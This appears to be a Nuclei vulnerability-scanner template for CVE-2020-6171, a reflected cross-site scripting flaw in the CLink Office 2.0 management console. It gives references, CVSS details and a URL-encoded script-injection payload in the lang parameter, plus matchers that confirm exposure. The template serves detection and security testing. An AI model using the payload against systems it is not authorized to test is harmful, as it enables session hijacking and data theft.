id: CVE-2020-6171 info: name: CLink Office 2.0 - Cross-Site Scripting author: pikpikcu severity: medium description: | CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/ - https://nvd.nist.gov/vuln/detail/CVE-2020-6171 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-6171 cwe-id: CWE-79 epss-score: 0.00135 epss-percentile: 0.48718 cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: communilink product: clink_office tags: cve,cve2020,xss,clink-office,communilink http: - method: GET path: - "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1" matchers-condition: and matchers: - type: word part: body words: - '">' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100eccf4156b2e2e18eb2dbae3fc7603bc29df28024442602931948dded760b785f022100e40a5a478ca7951d3f97fd2e55b23775c28f57b7517e6eb0a14019fe7ffa7db5:922c64590222798bb761d5b6d8e72950